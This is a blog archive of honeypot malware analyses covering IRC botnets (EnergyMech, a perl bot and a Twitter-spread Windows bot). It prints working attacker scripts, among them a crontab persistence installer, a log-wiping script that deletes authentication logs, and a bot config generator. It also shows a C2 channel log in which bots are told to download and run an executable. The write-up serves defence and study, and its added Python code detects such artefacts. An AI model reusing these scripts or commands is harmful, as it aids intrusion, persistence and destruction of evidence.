
Tag Archives: botnet

There are a number of reasons that a hacker/skid might want control of a machine. Compromised hosts serve as an ideal place to launch attacks from: once properly configured by an attacker (and, he hopes, not noticed by careless administrators), the bad guy can use the machine for a long time, for file storage or as a base for further malicious attacks.

In a recent attack, I witnessed an attacker dropping multiple files on my machine, both forms of IRC bot software. One of them was a seemingly well-known perl script created by a Brazilian group, Atrix-Team. Since it’s written in perl rather than one of the standard compiled languages, it’s much easier for others to customise and spread. The second was a .tar full of c source code, a few binaries, and some bash scripts. Nice!

Let’s take a look:

$ ls -l
-rwxrwxr-x 1 ubuntu ubuntu    317 Oct 30  2006 autorun
-rwxrwxr-x 1 ubuntu ubuntu  12210 Aug  4 00:26 b
-rwxrwxr-x 1 ubuntu ubuntu    485 Aug  5 12:07 clear.sh
-rwxrwxr-x 1 ubuntu ubuntu   7768 Aug 26 17:38 inst
-rwxrwxr-x 1 ubuntu ubuntu 397274 Dec  2  2005 kswapd1
-rwxrwxr-x 1 ubuntu ubuntu     34 Aug  5 11:14 run
drwxrwxr-x 2 ubuntu ubuntu   4096 Aug  5 11:55 src
-rwxrwxr-x 1 ubuntu ubuntu    327 Aug  4 12:34 start
-rwxrwxr-x 1 ubuntu ubuntu    169 Aug  5 12:47 update

Fun stuff! I count 8 executable files, and 1 directory. To pick it apart piece by piece:

autorun
$ file autorun
autorun: POSIX shell script, ASCII text executable

#!/bin/sh
pwd > mech.dir
dir=$(cat mech.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/m.pid; then
pid=\$(cat $dir/m.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./run &>/dev/null" > update
chmod u+x update

This is an interesting script. It records the current directory in mech.dir, then installs a crontab entry that runs update from that directory every minute with all output discarded (note that crontab cron.d replaces the user’s entire crontab with that one line). It then writes the update script itself, with the directory baked in, and makes it executable by its owner.

update
$ file update
update: POSIX shell script, ASCII text executable

#!/bin/sh
if test -r /var/spool/.m/m.pid; then
pid=$(cat /var/spool/.m/m.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /var/spool/.m
./run &>/dev/null

This is the script created by autorun, and configured to trigger automatically via crontab; the hard-coded path shows that the toolkit was unpacked into /var/spool/.m on this host. It checks that /var/spool/.m/m.pid is readable, and if so, reads the PID from the file and attempts to kill that process, exiting with status 0 if that succeeds. Otherwise it changes to the directory where the malicious files are stored and executes run.

run
$ file run
run: POSIX shell script, ASCII text executable

#!/bin/sh
export PATH=".";kswapd1

Short but sweet. Sets PATH to just the current directory (replacing it rather than adding to it), and then executes kswapd1 from there.
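A defender-side counterpart to the three scripts above, added here as an example (not part of the toolkit or the original post): it parses crontab -l output and flags entries that combine the traits of this watchdog entry. The sample crontab is constructed; only the /var/spool/.m/update line is taken from the scripts above.

```python
import re

# Constructed sample of `crontab -l` output. The third line is the entry
# autorun installs (path as it appears in the update script); the rest are
# benign entries added here for contrast.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
* * * * * /var/spool/.m/update >/dev/null 2>&1
*/5 * * * * /usr/bin/php /var/www/app/cron.php >/dev/null 2>&1
"""

def _traits(schedule, command):
    """Traits this kind of watchdog entry tends to combine. (The update
    script's `kill -CHLD` only probes whether the PID is alive, SIGCHLD
    being ignored by default, so it is the every-minute cadence that keeps
    the bot restarted.)"""
    traits = []
    if schedule == "* * * * *":
        traits.append("runs every minute")
    if re.search(r"/\.[^/\s]+/", command):           # e.g. /var/spool/.m/
        traits.append("runs from a hidden directory")
    if re.search(r"^/(var/spool|tmp|dev/shm)/", command):
        traits.append("runs from a spool or temp directory")
    if re.search(r">\s*/dev/null\s+2>&1", command):
        traits.append("discards all output")
    return traits

def suspicious_cron_entries(crontab_text, min_traits=2):
    """Parse `crontab -l` output and return (command, traits) for every
    entry showing at least `min_traits` of the traits above."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)     # five schedule fields, then the command
        if len(fields) < 6:
            continue
        schedule, command = " ".join(fields[:5]), fields[5]
        traits = _traits(schedule, command)
        if len(traits) >= min_traits:
            hits.append((command, traits))
    return hits

if __name__ == "__main__":
    for command, traits in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(command, "->", "; ".join(traits))
```

Entries using @reboot-style schedules are skipped by the five-field split, so extend the parser if those matter on your hosts.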

Sadly, we’re out of bash script land now. We’re onto the meat of the matter, the binary itself:

kswapd1
$ file kswapd1
kswapd1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
$ checksums
79217fb606e9b14c3a8d6c399bc74492 md5

First off, the name. kswapd1 is an apparent attempt to survive casual inspection of the process list by mimicking kswapd, the kernel swap daemon responsible for memory management on the system.
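One way to check for this kind of name mimicry, added here as an example and not from the post: a genuine kernel thread has an empty cmdline and no /proc/<pid>/exe target, so a "kswapd" with a binary behind it deserves a look. The process table below is constructed; the bot's path is taken from the update script above.

```python
import os

def looks_like_kernel_thread(cmdline, exe):
    """A genuine kernel thread (kswapd0, kthreadd, ...) has an empty cmdline
    and no readable /proc/<pid>/exe target; a userland binary has both."""
    return cmdline == "" and exe is None

def kernel_name_impostors(processes, prefixes=("kswapd", "kthreadd", "ksoftirqd", "kworker")):
    """Return (name, exe) for processes named like a kernel thread but backed
    by an executable on disk. A second kswapd on a multi-node box is legitimate,
    so the name alone is never enough."""
    return [(name, exe) for name, cmdline, exe in processes
            if name.startswith(prefixes) and not looks_like_kernel_thread(cmdline, exe)]

def read_proc():
    """Collect (comm, cmdline, exe) for every process on a live Linux host.
    Run as root: otherwise exe is unreadable for other users' processes and
    shows up as None, which would hide an impostor."""
    procs = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/comm") as f:
                name = f.read().strip()
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").strip().decode(errors="replace")
            try:
                exe = os.readlink(f"/proc/{pid}/exe")
            except OSError:
                exe = None            # kernel thread (or permission denied)
        except OSError:
            continue                  # process exited while we were looking
        procs.append((name, cmdline, exe))
    return procs

# Constructed process table: the real swap daemon, the bot from this post as it
# looks after `run` starts it from /var/spool/.m, and an ordinary daemon.
SAMPLE_PROCESSES = [
    ("kswapd0", "", None),
    ("kswapd1", "kswapd1", "/var/spool/.m/kswapd1"),
    ("sshd", "/usr/sbin/sshd -D", "/usr/sbin/sshd"),
]

if __name__ == "__main__":
    table = read_proc() if os.path.isdir("/proc") else SAMPLE_PROCESSES
    for name, exe in kernel_name_impostors(table):
        print(f"{name} is backed by {exe}")
```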

We can run the ‘strings’ command on the executable to hopefully get an idea about what we’re getting into. Inside, we can see a lot of references to IRC commands, and the distinctive word EnergyMech. EnergyMech is a free/open source IRC bot programmed in c. The feature list is respectable, and looks like a useful feature set for any aspiring botnet owner. This matches the contents of the src/ folder we found in the initial .tar file. Also, there are a number of referenced files, presumably generated once the IRC bot is running:

.genuser
./m.
./m.set
./m.ses
./m.help
./m.lev
./m.msg
./m.pid
./r/rquit.e
./r/raway.e
./r/rkicks.e
./r/rversions.e
./r/rpickup.e
./r/rinsult.e
./r/rtsay.e

This is supported by the reappearance of m.pid, which is apparently saved and used to shut down the bot. Since EnergyMech’s feature set is well documented on the site, and the attacker was unsuccessful in configuring it, I won’t waste time further inspecting the binary for now.

clear.sh
$ file clear.sh
clear.sh: Bourne-Again shell script, ASCII text executable, with CRLF line terminators

#!/bin/bash
unset HISTFILE HISTZONE HISTSAVE HISTORY
history -r
history -c
unset WATCH
export HISTFILE=/dev/null
rm -rf /usr/adm/lastlog
rm -rf /var/log/secure*
rm -rf /var/log/lastlog*
rm -rf /var/log/messages*
rm -rf /var/log/auth*
rm -rf /var/log/maillog*
rm -fr /var/log/lfd.log*
touch /var/log/maillog
touch /var/log/lfd.log
touch /var/log/messages
touch /var/log/secure
touch /var/log/lastlog
rm -rf /root/.bash_history
touch /root/.bash_history
./b -u root

A simple bash script that disables shell history, deletes the main authentication and system logs (including lastlog, which records last logins), recreates the log files empty, and then runs b -u root.

b
$ file b
b: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not stripped

A quick look at the ‘strings’ output yields several references to log cleaning. Using the poor man’s debugger (google) we identify one of the distinctive strings, ‘didn’t found any parametr to clean (username, hostname, tty)!’ as belonging to WhiteCat, a binary/log cleaner written in c by a member of the Hell Knights Crew.

There are two extra files that don’t seem to have been called so far by the others, inst and start. For the sake of completeness, I will give a breakdown of each.

start
$ file start
start: Bourne-Again shell script, ASCII text executable

#!/bin/bash
/sbin/ifconfig | grep -v "inet6" |grep "inet" | tr ':' ' '| awk '{ print $3 }' | grep -v "127.0.0.1" > vhosts
nrs=`cat vhosts | grep -c .`
######variables######
D=1
B=./vhosts
sleep 1
while read line; do
   ./inst $1 $line
case "$D" in
"1")
D=2
;;
"2")
D=3
;;
"3")
D=4
;;
"4")
D=1
;;
esac
 done < $B
./run
./autorun

The pipeline of greps retrieves the IP address(es) of the host and saves them into the file ‘vhosts’. That file is then read line by line, with each IP passed to inst as the second parameter, after the channel name that start itself received as $1. The D counter cycling through 1 to 4 (and the nrs line count) are never used. Finally, run and autorun are both called.

inst
$ file inst
inst: Bourne-Again shell script, ISO-8859 text executable

#!/bin/bash
Denominations="gaina
martoaga
martianu
sambatar
....snip....
costel
daniela
lucica
lucia"

ident=($Idents)
num_idents=${#ident[*]}

Realnames="Sato
Suzuki
Takahashi
Tanaka
Watanabe
....snip....
Demers
Gosselin"

denomination=($Denominations)
num_denominations=${#denomination[*]}

echo "SERVER Tampa.FL.US.Undernet.org 6667" >> m.set
echo "SERVER budapest.hu.eu.undernet 6667" >> m.set
echo "SERVER zurich.ch.eu.undernet.org" >> m.set
echo "SERVER lidingo.se.eu.undernet.org 6667" >> m.set
echo "SERVER manchester.uk.eu.undernet.org 6667" >> m.set
echo "SERVER mesa.az.us.undernet.org 6667" >> m.set
echo "SERVER bucharest.ro.eu.undernet.org 6667" >> m.set

echo "ENTITY $2" >> m.set

echo "### BOT 1 ###" >> m.set
echo "NICK ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "USERFILE $2.user" >> m.set
echo "CMDCHAR ." >> m.set
echo "LOGIN ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "IRCNAME ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "MODES +iwsx" >> m.set
echo "HASONOTICE" >> m.set
echo "VIRTUAL $2" >> m.set
echo "TOG CC          1" >> m.set
echo "TOG CLOAK       1" >> m.set
echo "TOG SPY         1" >> m.set
echo "SET OPMODES     6" >> m.set
echo "SET BANMODES    6" >> m.set
echo "CHANNEL         #$1 " >> m.set
echo "TOG PUB         1" >> m.set
echo "TOG MASS        1" >> m.set
echo "TOG SHIT        1" >> m.set
echo "TOG PROT        1" >> m.set
echo "TOG ENFM        0" >> m.set
echo "SET MKL         7" >> m.set
echo "SET MBL         7" >> m.set
echo "SET MPL         1" >> m.set

echo "### BOT 2 ###" >> m.set
echo "NICK ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "USERFILE $2.user2" >> m.set
echo "CMDCHAR ." >> m.set
echo "LOGIN ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "IRCNAME ${denomination[$((RANDOM%num_denominations))]}" >> m.set
echo "MODES +iwsx" >> m.set
echo "HASONOTICE" >> m.set
echo "VIRTUAL $2 " >> m.set
echo "TOG CC          1" >> m.set
echo "TOG CLOAK       1" >> m.set
echo "TOG SPY         1" >> m.set
echo "SET OPMODES     6" >> m.set
echo "SET BANMODES    6" >> m.set
echo "CHANNEL         #$1 " >> m.set
echo "TOG PUB         1" >> m.set
echo "TOG MASS        1" >> m.set
echo "TOG SHIT        1" >> m.set
echo "TOG PROT        1" >> m.set
echo "TOG ENFM        0" >> m.set
echo "SET MKL         7" >> m.set
echo "SET MBL         7" >> m.set
echo "SET MPL         1" >> m.set

echo "handle  z " >> $2.user
echo "mask  *!*@zmeu.users.undernet.org " >> $2.user

echo "prot  4" >> $2.user
echo "channel   * " >> $2.user
echo "access  100 " >> $2.user

echo "handle  z " >> $2.user2
echo "mask  *!*@zmeu.users.undernet.org " >> $2.user2
echo "prot  4" >> $2.user2
echo "channel   * " >> $2.user2
echo "access  100 " >> $2.user2

This file generates the configuration for the EnergyMech bots, as well as the individual user files. It takes two inputs, $1 and $2, from ./start: $1 is the channel to join, and $2 is the host IP address passed in from start, which becomes the bot’s VIRTUAL (vhost) address and the name of its user file. The nick, login and IRC name are each picked at random from the Denominations list in the script, which seemed to be a mix of actual names and random words (the Realnames list is defined but never used in the script as shown).
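To turn such an m.set into blockable indicators, an added example parser (not EnergyMech’s own code; the “KEY value” layout is taken from what inst writes above). The sample config is constructed, and treating a SERVER line with no port as 6667 is an assumption.

```python
# Constructed m.set in the shape inst writes above; only a few keys are kept.
SAMPLE_MSET = """\
SERVER Tampa.FL.US.Undernet.org 6667
SERVER zurich.ch.eu.undernet.org
ENTITY 10.0.0.5
### BOT 1 ###
NICK gaina
USERFILE 10.0.0.5.user
TOG SPY         1
CHANNEL         #testchan 
### BOT 2 ###
NICK lucia
USERFILE 10.0.0.5.user2
CHANNEL         #testchan 
"""

def parse_mset(text):
    """Return (global_settings, bots). SERVER collects (host, port) tuples; a
    missing port is assumed to be 6667 (assumption, not documented behaviour).
    "TOG X" / "SET X" lines are stored under the two-word key."""
    global_, bots, current = {"SERVER": []}, [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("### BOT"):        # inst's per-bot separator
            current = {}
            bots.append(current)
            continue
        key, _, value = line.partition(" ")
        value = value.strip()
        if key in ("TOG", "SET"):
            sub, _, value = value.partition(" ")
            key, value = f"{key} {sub}", value.strip()
        if key == "SERVER":
            host, _, port = value.partition(" ")
            global_["SERVER"].append((host, int(port) if port.strip() else 6667))
        else:
            (global_ if current is None else current)[key] = value
    return global_, bots

def c2_indicators(text):
    """Flatten the parsed config into what is worth blocking or hunting for."""
    global_, bots = parse_mset(text)
    return {
        "servers": sorted({host.lower() for host, _ in global_["SERVER"]}),
        "ports": sorted({port for _, port in global_["SERVER"]}),
        "channels": sorted({b["CHANNEL"] for b in bots if "CHANNEL" in b}),
        "nicks": [b.get("NICK") for b in bots],
    }
```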

Fortunately, from the Kippo log, the attacker kindly showed us exactly what channel he was trying to use. Unfortunately, if it’s hosted on a public server, it’s going to be very resilient. I hopped onto a VPN, and into the IRC to have a look around. There were 21 users, including 2 operators, 1 of whom was an undernet service. The other had a cloaked hostname. Of the rest, 4 had undernet cloaked hostnames, and the remainder did not. A small botnet, if my suspicions are correct, and unlikely to grow fast if the operators are manually installing the bots on compromised hosts.

Thanks for stopping by, @DINAMO of #raul, connecting to the honeypot from 87.219.142.165 on Oct 26th. It’s always fun to have ‘live ammunition’ to play with.

Bonus Round

The perl script was downloaded from hxxp://dearlifefuckyou.com/xaoc/max.txt, and the homepage of dearlifefuckyou.com is blanked out except for an advert and the text “// xaoc was here”. The config of the perl script was as follows:

my $section=chr(120) . chr(46) . chr(115) . chr(105) . chr(116) . chr(104) . chr(110) . chr(101) . chr(116) . chr(46) . chr(111) . chr(114) . chr(103);
my $porta=chr(49) . chr(49) . chr(50) . chr(49) . chr(49);
my @interval=chr(35) . chr(46) . chr(106);
my @location=chr(120) . chr(88) . chr(120);
my $mapp=chr(115) . chr(117) . chr(110);
push(@location,$mapp);

While this is top end obfuscation, I think we can crack it.

my $section='x.sithnet.org';
my $porta='11211';
my @interval='#.j';
my @location='xXx';
my $mapp='sun';
push(@location,$mapp);
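The same decoding done mechanically, as an added example that is not from the post: it rewrites each chr(n) . chr(m) chain as a Perl string literal and then collects the assignments. The input is the five obfuscated lines quoted above.

```python
import re

# The obfuscated lines quoted above, used here as the sample input; the
# push() line is included to show that ordinary code passes through untouched.
OBFUSCATED = """\
my $section=chr(120) . chr(46) . chr(115) . chr(105) . chr(116) . chr(104) . chr(110) . chr(101) . chr(116) . chr(46) . chr(111) . chr(114) . chr(103);
my $porta=chr(49) . chr(49) . chr(50) . chr(49) . chr(49);
my @interval=chr(35) . chr(46) . chr(106);
my @location=chr(120) . chr(88) . chr(120);
my $mapp=chr(115) . chr(117) . chr(110);
push(@location,$mapp);
"""

CHR_CALL = re.compile(r"chr\(\s*(\d+)\s*\)")
# One chr(n) call, or several joined by Perl's '.' concatenation operator.
CHR_CHAIN = re.compile(r"chr\(\s*\d+\s*\)(?:\s*\.\s*chr\(\s*\d+\s*\))*")

def decode_chr_chains(source):
    """Replace each chr(n) . chr(m) ... chain with the string it builds,
    written as a Perl single-quoted literal so the result is still valid Perl."""
    def literal(match):
        text = "".join(chr(int(n)) for n in CHR_CALL.findall(match.group(0)))
        return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"
    return CHR_CHAIN.sub(literal, source)

def config_values(source):
    """Map each `my $name=...` / `my @name=...` assignment to its decoded string."""
    decoded = decode_chr_chains(source)
    return dict(re.findall(r"my\s+[$@](\w+)\s*=\s*'((?:[^'\\]|\\.)*)'", decoded))

if __name__ == "__main__":
    print(decode_chr_chains(OBFUSCATED))
```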

While it is not currently up, sithnet.org resolves to 212.199.115.203, which has also gone by terahost.tv and has a history of bad behaviour.


Over a slow weekend, I decided to make my first attempt at running a Dionaea honeypot to catch some malware samples to play with. Armed with this simple guide and a micro Amazon EC2 instance, the whole thing was up and running in well under an hour. For my first attempt, I stuck with the default configuration. I imagine there are a lot of improvements and tweaks that I entirely missed.

It didn’t take long to start getting hits, and after three days I stopped. The honeypot had produced a 6.1 GB log, and the instance was beginning to complain that there was no space left on the drive to write to. I had managed to snag three binaries:

47b2e95136e660522067221ae405025c
9b9df225dfc4b43c727b9177e9eb0678
fd1fb45d7ca1eeef06f5d46a3e9a3d2f

It had been surveyed by 2387 unique IP addresses over 10 different protocols. However, I found that all three binaries on the system were the responsibility of one hacker (group?), originating from a Ukrainian IP address.

We can see the connections here:

Time                  Protocol      Local Port   Remote IP
2012-09-19 17:43:49   smbd          445          46.119.232.93
2012-09-19 17:43:49   smbd          445          46.119.232.93
2012-09-19 17:43:52   remoteshell   1957         46.119.232.93
2012-09-19 19:15:52   smbd          445          46.119.232.93
2012-09-19 19:15:52   smbd          445          46.119.232.93
2012-09-19 19:15:56   remoteshell   1957         46.119.232.93

And here we have the downloads:

URL                            md5
hxxp://46.120.20.85:12097/x    9b9df225dfc4b43c727b9177e9eb0678
txxp://46.128.183.60/host.exe  fd1fb45d7ca1eeef06f5d46a3e9a3d2f
txxp://46.128.183.60/host.exe  fd1fb45d7ca1eeef06f5d46a3e9a3d2f
txxp://46.128.172.44/host.exe  47b2e95136e660522067221ae405025c

The next interesting point is the URLs in the log. The majority of URLs captured seemed to be used primarily for spam. Some quick stats:

3059 mail login attempts
293845 advertisement urls
71 forum registrations

Next up, fun with Kippo.

So I found an interesting site that parsed Twitter feeds for potentially malicious links. Based on the filenames mentioned, it did so with reasonable accuracy. So I did what any sensible person would do: fired up a handy Windows XP VM and followed some links.

The first bit of malware was not difficult to find. A compromised Twitter account has been spamming links for the past week, using the much loved .jpg.exe gambit.

I set Wireshark to run, and with bated breath, ran the executable.

3	10.0.2.15	194.168.4.100	Standard query A xx.wshells.ws
4	194.168.4.100	10.0.2.15	Standard query response, No such name
5	10.0.2.15	194.168.4.100	Standard query A bxxxa.wshells.ws
6	194.168.4.100	10.0.2.15	Standard query response A 208.xx.xx.77

Straight away, it made two DNS requests, both looking for subdomains of wshells.ws. wshells.ws offers hosting, shells and IRC services to anyone with a few dollars to spare, per month. Consulting their FAQ, “abusive” botnets are not allowed, but no abuse email is listed on the contact page.

Anyway. As you can see, the response from the DNS lookup was that bxxxa.wshells.ws was located at 208.xx.xx.77. I watched as the program connected to an IRC channel. The MOTD informed me that this was one of 13 botnet servers, running an IRC daemon modified by unKn0wn Crew. A quick google shows that this is a modded version of the popular Unreal IRCd. Doesn’t take much more digging to find the (alleged) source of the modified daemon.

echo "|     UnrealIRCd - Modded by iD [uNkn0wn-Crew]     |"
echo "|          www.uNkn0wn.eu - iD@uNkn0wn.eu          |"
echo "|--------------------------------------------------|"
echo "|     IT IS VERY PRIVATE, SO DO NOT DISTRIBUTE     |"

The server itself seems to be run by a different group.

Irc.D3v1Lz.Com Message of the Day - 
5/4/2012 15:17
###################################################
# ________  ________       ____.____              #
# \______ \ \_____  \__  _/_   |    |    ________ #
#  |    |  \  _(__     \/ /|   |    |    \___   / #
#  |    `   \/       \   / |   |    |___  /    /  #
# /_______  /______  /\_/  |___|_______ \/_____ \ #
#         \/       \/                  \/      \/ #
# __________        __   _______          __      #
# \______   \ _____/  |_ \      \   _____/  |_    #
#  |    |  _//  _ \   __\/   |   \_/ __ \   __\   #
#  |    |   (   )  | /    |    \  ___/   |  |     #
#  |______  /\____/|__| \____|__  /\___   __|     #
#         \/                    \/     \/         #
###################################################
      D3v1Lz BotNet Server, Just Stay Away   
   1 Of 13 BotNet Server Managed By Sh "Opper"
               Testing Server

From what I can tell, the nickname that the malware uses upon connection to the server is of the form:

[?]{[countrycode]|[OS]}[randomisedname]

for example:

a{USA|XPa}qafsffg

After connecting, the following exchange was had:

JOIN #$wsh [pass removed]
:n{GB|XPa}a{USA|XPa}qafsffg@host.name.redacted.com JOIN :#$wsh
:Irc.D3v1Lz.Com 332 a{USA|XPa}qafsffg #$wsh :@nd http://up2x.com/u/1943960303.image001234.exe
:Irc.D3v1Lz.Com 333 a{USA|XPa}qafsffg #$wsh Sp5 1340769512
PRIVMSG #$wsh :[d="hxxp://up2x.com/u/1943960303.image001234.exe" s="387584 bytes"] Executed file "C:\Documents and Settings\Administrator\Application Data\207.exe" - Download retries: 0
:Irc.D3v1Lz.Com 404 a{USA|XPa}qafsffg #$wsh :You must have a registered nick (+r) to talk on this channel (#$wsh)
PING :Irc.D3v1Lz.Com
PONG :Irc.D3v1Lz.Com
PING :Irc.D3v1Lz.Com
PONG :Irc.D3v1Lz.Com
PING :Irc.D3v1Lz.Com
PONG :Irc.D3v1Lz.Com

Wireshark shows that at this point a DNS request was made for up2x.com, the file 1943960303.image001234.exe was downloaded, and success was reported back to the control channel. I may analyse the dropped executables in another post. After a few minutes of ping-pong between the VM and the IRC server, I exported the dump and shut down the VM.
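A parser for this capture, added here as an example and not part of the original post: it picks the bot nicks out of the server’s numeric replies, extracts the topic that carries the download command, and parses the bot’s own status report. The session text is constructed from the lines above.

```python
import re

# Constructed from the exchange above (host name and password were already
# redacted in the post); JOIN and PING lines are kept to show they are skipped.
SESSION = r"""
JOIN #$wsh [pass removed]
:n{GB|XPa}a{USA|XPa}qafsffg@host.name.redacted.com JOIN :#$wsh
:Irc.D3v1Lz.Com 332 a{USA|XPa}qafsffg #$wsh :@nd http://up2x.com/u/1943960303.image001234.exe
:Irc.D3v1Lz.Com 333 a{USA|XPa}qafsffg #$wsh Sp5 1340769512
PRIVMSG #$wsh :[d="hxxp://up2x.com/u/1943960303.image001234.exe" s="387584 bytes"] Executed file "C:\Documents and Settings\Administrator\Application Data\207.exe" - Download retries: 0
:Irc.D3v1Lz.Com 404 a{USA|XPa}qafsffg #$wsh :You must have a registered nick (+r) to talk on this channel (#$wsh)
PING :Irc.D3v1Lz.Com
"""

# Nick form described above: [?]{[countrycode]|[OS]}[randomisedname]
BOT_NICK = re.compile(r"^[a-z]\{(?P<cc>[A-Z]{2,3})\|(?P<os>[A-Za-z0-9]+)\}(?P<rand>[a-z0-9]+)$")
# Server numeric reply: ":server NNN target channel [:]text"
NUMERIC = re.compile(r"^:(?P<server>\S+) (?P<code>\d{3}) (?P<nick>\S+) (?P<chan>\S+) :?(?P<rest>.*)$")
# The bot's own status report after it fetched and ran the dropped file.
REPORT = re.compile(r'^PRIVMSG (?P<chan>\S+) :\[d="(?P<url>[^"]+)" s="(?P<size>\d+) bytes"\] '
                    r'Executed file "(?P<path>[^"]+)" - Download retries: (?P<retries>\d+)$')

def parse_bot_nick(nick):
    """Return {'cc', 'os', 'rand'} if the nick follows the bot's pattern, else None."""
    m = BOT_NICK.match(nick)
    return m.groupdict() if m else None

def summarise_session(text):
    """Pull bot nicks, the channel topic (which carries the command) and any
    download reports out of a captured client/server exchange."""
    summary = {"nicks": set(), "topic": None, "topic_urls": [], "downloads": []}
    for line in text.splitlines():
        m = NUMERIC.match(line)
        if m:
            if parse_bot_nick(m["nick"]):
                summary["nicks"].add(m["nick"])
            if m["code"] == "332":              # RPL_TOPIC
                summary["topic"] = m["rest"]
                summary["topic_urls"] = re.findall(r"https?://\S+", m["rest"])
            continue
        m = REPORT.match(line)
        if m:
            report = m.groupdict()
            report["size"] = int(report["size"])
            report["retries"] = int(report["retries"])
            summary["downloads"].append(report)
    return summary
```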

I expect this is an upcoming project of someone’s. The IRC channel was empty except for me, and as the MOTD says, it’s a testing server. Furthermore, the compromised Twitter account has only been spamming malware links for about a week.